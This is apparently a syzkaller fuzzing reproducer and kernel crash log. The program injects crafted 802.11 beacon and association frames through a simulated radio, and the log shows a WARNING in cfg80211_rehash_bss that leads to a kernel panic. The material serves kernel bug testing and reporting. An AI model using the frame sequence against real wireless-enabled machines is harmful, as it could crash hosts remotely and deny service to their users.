program: r0 = openat$procfs(0xffffffffffffff9c, &(0x7f00000001c0)='/proc/timer_list\x00', 0x0, 0x0) r1 = openat$sysctl(0xffffffffffffff9c, &(0x7f0000000580)='/proc/sys/net/ipv4/tcp_timestamps\x00', 0x1, 0x0) sendfile(r1, r0, &(0x7f00000000c0)=0x8b, 0x100000500) r2 = socket$nl_generic(0x10, 0x3, 0x10) r3 = syz_genetlink_get_family_id$nl80211(&(0x7f0000000080), 0xffffffffffffffff) ioctl$FITRIM(r0, 0xc0185879, &(0x7f0000000040)={0xfffffffffffffff8, 0x6, 0x28c}) ioctl$sock_SIOCGIFINDEX_80211(r2, 0x8933, &(0x7f00000000c0)={'wlan1\x00', 0x0}) sendmsg$NL80211_CMD_SET_INTERFACE(r2, &(0x7f0000000100)={0x0, 0x0, &(0x7f0000000140)={&(0x7f0000000180)={0x24, r3, 0x5, 0x0, 0x0, {{}, {@val={0x8, 0x3, r4}, @void}}, [@NL80211_ATTR_IFTYPE={0x8, 0x5, 0x2}]}, 0x24}}, 0x0) sendmsg$NL80211_CMD_CONNECT(r2, &(0x7f00000001c0)={0x0, 0x0, &(0x7f0000000380)={&(0x7f0000000240)={0x30, r3, 0x5, 0x0, 0x0, {{}, {@val={0x8, 0x3, r4}, @void}}, [@NL80211_ATTR_SSID={0xa, 0x34, @default_ap_ssid}, @chandef_params=[@NL80211_ATTR_WIPHY_FREQ={0x8}]]}, 0x30}}, 0x0) syz_80211_inject_frame(&(0x7f00000002c0)=@device_b, &(0x7f0000000000)=@mgmt_frame=@probe_response={{{}, {}, @device_b, @device_a, @from_mac, {0x0, 0x20}}, 0x0, @random=0x4, 0x1, @val={0x0, 0x6, @default_ap_ssid}, @val={0x1, 0x1, [{0x2, 0x1}]}, @void, @void, @void, @void, @void, @val={0x71, 0x7, {0x1, 0x1, 0xffffffffffffffff, 0x0, 0xffffffffffffffff, 0xf3}}}, 0x38) nanosleep(&(0x7f0000000340)={0x0, 0x2faf080}, 0x0) syz_80211_inject_frame(&(0x7f00000003c0)=@device_b, &(0x7f0000000400)=@mgmt_frame=@auth={{{}, {}, @device_b, @device_a, @from_mac, {0x0, 0x1}}, 0x0, 0x2, 0x0, @void}, 0x1e) syz_80211_inject_frame(&(0x7f00000004c0)=@device_b, &(0x7f0000000500)=@mgmt_frame=@assoc_resp={{{}, {}, @device_b, @device_a, @from_mac, {0x0, 0x2}}, 0x1, 0x0, @default, @val, @void}, 0x20) syz_80211_inject_frame(&(0x7f0000000300)=@device_b, &(0x7f00000008c0)=@mgmt_frame=@beacon={{{}, {}, @device_b, @device_b, @from_mac}, 0x0, @default, 0x1, @void, @void, @void, @void, @void, @val={0x5, 0x3, {0x7c, 0x20, 0x8}}, @val={0x25, 0x3, {0x0, 0x2, 0x4}}, @val={0x2a, 0x1, {0x1, 0x1}}, @val={0x3c, 0x4, {0x0, 0x3d, 0xab, 0x5}}, @val={0x2d, 0x1a, {0x8, 0x3, 0x1, 0x0, {0x5, 0x9, 0x0, 0x6, 0x0, 0x1, 0x0, 0x0, 0x1}, 0x6, 0x4, 0x5}}, @void, @val={0x71, 0x7, {0x0, 0x1, 0x0, 0x0, 0x0, 0x2, 0x21}}, @val={0x76, 0x6, {0x0, 0x9, 0x3d, 0x1}}}, 0x64) syz_usb_connect$hid(0x0, 0x36, &(0x7f0000000340)=ANY=[@ANYBLOB="12013f00000000407f04ffff0000000000010902"], 0x0) syz_80211_inject_frame(&(0x7f0000000300)=@device_b, &(0x7f00000005c0)=ANY=[@ANYBLOB="80000000080211000001080211000001080211000000000000000058a05f916781bf2a00000602020202020205037c200825030002042a01033c04003dab052d1a0800070500000000000000090006001100000000040400000005710700030000000221760600093d000100"], 0x6c) r5 = socket$kcm(0x2, 0x1, 0x0) sendmsg$inet(r5, &(0x7f0000000280)={&(0x7f0000000000)={0x2, 0x4001, @remote}, 0x10, 0x0}, 0x20000811) [ 87.840655][ T4675] Bluetooth: hci0: command tx timeout [ 88.090583][ T5330] mac80211_hwsim: wmediumd released netlink socket, switching to perfect channel medium [ 88.129308][ T5316] wlan1: authenticate with 08:02:11:00:00:00 (local address=08:02:11:00:00:01) [ 88.133281][ T5316] wlan1: send auth to 08:02:11:00:00:00 (try 1/3) [ 88.148931][ T1095] wlan1: authenticated [ 88.151220][ T5330] mac80211_hwsim: wmediumd released netlink socket, switching to perfect channel medium [ 88.156657][ T1095] wlan1: associate with 08:02:11:00:00:00 (try 1/3) [ 88.162889][ T1095] wlan1: RX AssocResp from 08:02:11:00:00:00 (capab=0x1 status=0 aid=1) [ 88.167825][ T5330] mac80211_hwsim: wmediumd released netlink socket, switching to perfect channel medium [ 88.173342][ T1095] wlan1: associated [ 88.179040][ T1095] wlan1: cannot understand ECSA IE operating class, 61, ignoring [ 88.183452][ T5330] mac80211_hwsim: wmediumd released netlink socket, switching to perfect channel medium [ 88.434608][ T5316] usb 5-1: new high-speed USB device number 2 using dummy_hcd [ 88.587248][ T5316] usb 5-1: config 0 has no interfaces? [ 88.589671][ T5316] usb 5-1: New USB device found, idVendor=047f, idProduct=ffff, bcdDevice= 0.00 [ 88.593410][ T5316] usb 5-1: New USB device strings: Mfr=0, Product=0, SerialNumber=0 [ 88.604842][ T5316] usb 5-1: config 0 descriptor?? [ 88.810179][ T1095] wlan1: cannot understand ECSA IE operating class, 61, ignoring [ 88.814905][ T5330] mac80211_hwsim: wmediumd released netlink socket, switching to perfect channel medium [ 88.822587][ T1095] ------------[ cut here ]------------ [ 88.825246][ T1095] WARNING: net/wireless/scan.c:1666 at cfg80211_rehash_bss+0x1e6/0x540, CPU#0: kworker/u4:10/1095 [ 88.829933][ T1095] Modules linked in: [ 88.831812][ T1095] CPU: 0 UID: 0 PID: 1095 Comm: kworker/u4:10 Not tainted syzkaller #0 PREEMPT(full) [ 88.836194][ T1095] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014 [ 88.840833][ T1095] Workqueue: events_unbound cfg80211_wiphy_work [ 88.843612][ T1095] RIP: 0010:cfg80211_rehash_bss+0x1e6/0x540 [ 88.846200][ T1095] Code: e8 48 c1 e8 03 42 0f b6 04 30 84 c0 0f 85 33 03 00 00 ff 45 00 48 83 c4 18 5b 41 5c 41 5d 41 5e 41 5f 5d c3 cc cc cc cc cc 90 <0f> 0b 90 4c 8b 2c 24 4c 89 ef e8 eb 0b ea f9 84 c0 74 78 e8 82 ec [ 88.854494][ T1095] RSP: 0018:ffffc9000356eee0 EFLAGS: 00010246 [ 88.857127][ T1095] RAX: ffffffff8aafd2b5 RBX: 0000000000000000 RCX: 0000000000000002 [ 88.860762][ T1095] RDX: ffff88803612c980 RSI: 0000000000000000 RDI: 0000000000000000 [ 88.864139][ T1095] RBP: ffff8880114d0468 R08: 0000000000000000 R09: 0000000000000002 [ 88.867725][ T1095] R10: 0000000000000002 R11: 0000000000000002 R12: ffff8880122101a0 [ 88.871437][ T1095] R13: ffff8880377a0c30 R14: dffffc0000000000 R15: ffff8880114b0420 [ 88.875046][ T1095] FS: 0000000000000000(0000) GS:ffff88808d22f000(0000) knlGS:0000000000000000 [ 88.878769][ T1095] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 88.881596][ T1095] CR2: 00007ffed551afe8 CR3: 0000000011bef000 CR4: 0000000000352ef0 [ 88.885123][ T1095] Call Trace: [ 88.886694][ T1095] [ 88.888028][ T1095] cfg80211_update_assoc_bss_entry+0x3fa/0x6a0 [ 88.890633][ T1095] cfg80211_ch_switch_notify+0x3c1/0x770 [ 88.893643][ T1095] ieee80211_sta_process_chanswitch+0xb05/0x2890 [ 88.896928][ T1095] ? __pfx_ieee80211_sta_process_chanswitch+0x10/0x10 [ 88.899809][ T1095] ? lockdep_hardirqs_on+0x98/0x140 [ 88.902175][ T1095] ieee80211_rx_mgmt_beacon+0x1d6f/0x3230 [ 88.904770][ T1095] ? __pfx_ieee80211_rx_mgmt_beacon+0x10/0x10 [ 88.907271][ T1095] ieee80211_sta_rx_queued_mgmt+0x4ed/0x4520 [ 88.909868][ T1095] ? __lock_acquire+0x6b6/0x2cf0 [ 88.912218][ T1095] ? __pfx_ieee80211_sta_rx_queued_mgmt+0x10/0x10 [ 88.914859][ T1095] ? __lock_acquire+0x6b6/0x2cf0 [ 88.917081][ T1095] ? do_raw_spin_lock+0x121/0x290 [ 88.919396][ T1095] ? __lock_acquire+0x6b6/0x2cf0 [ 88.921471][ T1095] ? __lock_acquire+0x6b6/0x2cf0 [ 88.923885][ T1095] ? __lock_acquire+0x6b6/0x2cf0 [ 88.926145][ T1095] ? __lock_acquire+0x6b6/0x2cf0 [ 88.928404][ T1095] ? do_raw_spin_lock+0x121/0x290 [ 88.930841][ T1095] ? kcov_remote_start+0x4d3/0x7f0 [ 88.933563][ T1095] ieee80211_iface_work+0x652/0x12d0 [ 88.936077][ T1095] cfg80211_wiphy_work+0x2ab/0x450 [ 88.938485][ T1095] ? process_scheduled_works+0x9ef/0x1770 [ 88.941233][ T1095] process_scheduled_works+0xad1/0x1770 [ 88.943877][ T1095] ? __pfx_process_scheduled_works+0x10/0x10 [ 88.946763][ T1095] worker_thread+0x8a0/0xda0 [ 88.949057][ T1095] kthread+0x711/0x8a0 [ 88.951991][ T1095] ? __pfx_worker_thread+0x10/0x10 [ 88.954478][ T1095] ? __pfx_kthread+0x10/0x10 [ 88.956651][ T1095] ? _raw_spin_unlock_irq+0x23/0x50 [ 88.959069][ T1095] ? lockdep_hardirqs_on+0x98/0x140 [ 88.961383][ T1095] ? __pfx_kthread+0x10/0x10 [ 88.963459][ T1095] ret_from_fork+0x599/0xb30 [ 88.965440][ T1095] ? __pfx_ret_from_fork+0x10/0x10 [ 88.967881][ T1095] ? __pfx_kthread+0x10/0x10 [ 88.970100][ T1095] ret_from_fork_asm+0x1a/0x30 [ 88.972404][ T1095] [ 88.973766][ T1095] Kernel panic - not syncing: kernel: panic_on_warn set ... [ 88.977028][ T1095] CPU: 0 UID: 0 PID: 1095 Comm: kworker/u4:10 Not tainted syzkaller #0 PREEMPT(full) [ 88.981180][ T1095] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014 [ 88.985786][ T1095] Workqueue: events_unbound cfg80211_wiphy_work [ 88.988610][ T1095] Call Trace: [ 88.990146][ T1095] [ 88.991406][ T1095] dump_stack_lvl+0x99/0x250 [ 88.993292][ T1095] ? __asan_memcpy+0x40/0x70 [ 88.995199][ T1095] ? __pfx_dump_stack_lvl+0x10/0x10 [ 88.997324][ T1095] ? __pfx__printk+0x10/0x10 [ 88.999277][ T1095] vpanic+0x237/0x6d0 [ 89.001249][ T1095] ? __pfx_vpanic+0x10/0x10 [ 89.003860][ T1095] ? is_bpf_text_address+0x292/0x2b0 [ 89.006731][ T1095] ? is_bpf_text_address+0x26/0x2b0 [ 89.009623][ T1095] panic+0xb9/0xc0 [ 89.011600][ T1095] ? __pfx_panic+0x10/0x10 [ 89.013625][ T1095] ? ret_from_fork_asm+0x1a/0x30 [ 89.015812][ T1095] __warn+0x317/0x4b0 [ 89.017564][ T1095] ? cfg80211_rehash_bss+0x1e6/0x540 [ 89.019865][ T1095] ? cfg80211_rehash_bss+0x1e6/0x540 [ 89.022204][ T1095] __report_bug+0x288/0x500 [ 89.024409][ T1095] ? __pfx_do_raw_spin_lock+0x10/0x10 [ 89.026816][ T1095] ? cfg80211_rehash_bss+0x1e6/0x540 [ 89.029135][ T1095] ? __pfx___report_bug+0x10/0x10 [ 89.031423][ T1095] ? __lock_acquire+0x6b6/0x2cf0 [ 89.033666][ T1095] ? cfg80211_rehash_bss+0x1e6/0x540 [ 89.035910][ T1095] report_bug+0x16a/0x220 [ 89.037723][ T1095] ? cfg80211_rehash_bss+0x1e6/0x540 [ 89.039874][ T1095] ? cfg80211_rehash_bss+0x1e8/0x540 [ 89.042051][ T1095] handle_bug+0x98/0x200 [ 89.043809][ T1095] exc_invalid_op+0x1a/0x50 [ 89.045689][ T1095] asm_exc_invalid_op+0x1a/0x20 [ 89.047762][ T1095] RIP: 0010:cfg80211_rehash_bss+0x1e6/0x540 [ 89.050415][ T1095] Code: e8 48 c1 e8 03 42 0f b6 04 30 84 c0 0f 85 33 03 00 00 ff 45 00 48 83 c4 18 5b 41 5c 41 5d 41 5e 41 5f 5d c3 cc cc cc cc cc 90 <0f> 0b 90 4c 8b 2c 24 4c 89 ef e8 eb 0b ea f9 84 c0 74 78 e8 82 ec [ 89.059532][ T1095] RSP: 0018:ffffc9000356eee0 EFLAGS: 00010246 [ 89.062471][ T1095] RAX: ffffffff8aafd2b5 RBX: 0000000000000000 RCX: 0000000000000002 [ 89.066443][ T1095] RDX: ffff88803612c980 RSI: 0000000000000000 RDI: 0000000000000000 [ 89.070251][ T1095] RBP: ffff8880114d0468 R08: 0000000000000000 R09: 0000000000000002 [ 89.074043][ T1095] R10: 0000000000000002 R11: 0000000000000002 R12: ffff8880122101a0 [ 89.077958][ T1095] R13: ffff8880377a0c30 R14: dffffc0000000000 R15: ffff8880114b0420 [ 89.081689][ T1095] ? cfg80211_rehash_bss+0xe5/0x540 [ 89.084095][ T1095] cfg80211_update_assoc_bss_entry+0x3fa/0x6a0 [ 89.086856][ T1095] cfg80211_ch_switch_notify+0x3c1/0x770 [ 89.089399][ T1095] ieee80211_sta_process_chanswitch+0xb05/0x2890 [ 89.092311][ T1095] ? __pfx_ieee80211_sta_process_chanswitch+0x10/0x10 [ 89.095417][ T1095] ? lockdep_hardirqs_on+0x98/0x140 [ 89.097680][ T1095] ieee80211_rx_mgmt_beacon+0x1d6f/0x3230 [ 89.100373][ T1095] ? __pfx_ieee80211_rx_mgmt_beacon+0x10/0x10 [ 89.103132][ T1095] ieee80211_sta_rx_queued_mgmt+0x4ed/0x4520 [ 89.105945][ T1095] ? __lock_acquire+0x6b6/0x2cf0 [ 89.108182][ T1095] ? __pfx_ieee80211_sta_rx_queued_mgmt+0x10/0x10 [ 89.111037][ T1095] ? __lock_acquire+0x6b6/0x2cf0 [ 89.113266][ T1095] ? do_raw_spin_lock+0x121/0x290 [ 89.115539][ T1095] ? __lock_acquire+0x6b6/0x2cf0 [ 89.117930][ T1095] ? __lock_acquire+0x6b6/0x2cf0 [ 89.120161][ T1095] ? __lock_acquire+0x6b6/0x2cf0 [ 89.122355][ T1095] ? __lock_acquire+0x6b6/0x2cf0 [ 89.124648][ T1095] ? do_raw_spin_lock+0x121/0x290 [ 89.126961][ T1095] ? kcov_remote_start+0x4d3/0x7f0 [ 89.129244][ T1095] ieee80211_iface_work+0x652/0x12d0 [ 89.131636][ T1095] cfg80211_wiphy_work+0x2ab/0x450 [ 89.133977][ T1095] ? process_scheduled_works+0x9ef/0x1770 [ 89.136523][ T1095] process_scheduled_works+0xad1/0x1770 [ 89.138981][ T1095] ? __pfx_process_scheduled_works+0x10/0x10 [ 89.141608][ T1095] worker_thread+0x8a0/0xda0 [ 89.143750][ T1095] kthread+0x711/0x8a0 [ 89.145697][ T1095] ? __pfx_worker_thread+0x10/0x10 [ 89.148051][ T1095] ? __pfx_kthread+0x10/0x10 [ 89.150179][ T1095] ? _raw_spin_unlock_irq+0x23/0x50 [ 89.152591][ T1095] ? lockdep_hardirqs_on+0x98/0x140 [ 89.155133][ T1095] ? __pfx_kthread+0x10/0x10 [ 89.157388][ T1095] ret_from_fork+0x599/0xb30 [ 89.159547][ T1095] ? __pfx_ret_from_fork+0x10/0x10 [ 89.161844][ T1095] ? __pfx_kthread+0x10/0x10 [ 89.164014][ T1095] ret_from_fork_asm+0x1a/0x30 [ 89.166159][ T1095] [ 89.167889][ T1095] Kernel Offset: disabled [ 89.169806][ T1095] Rebooting in 86400 seconds..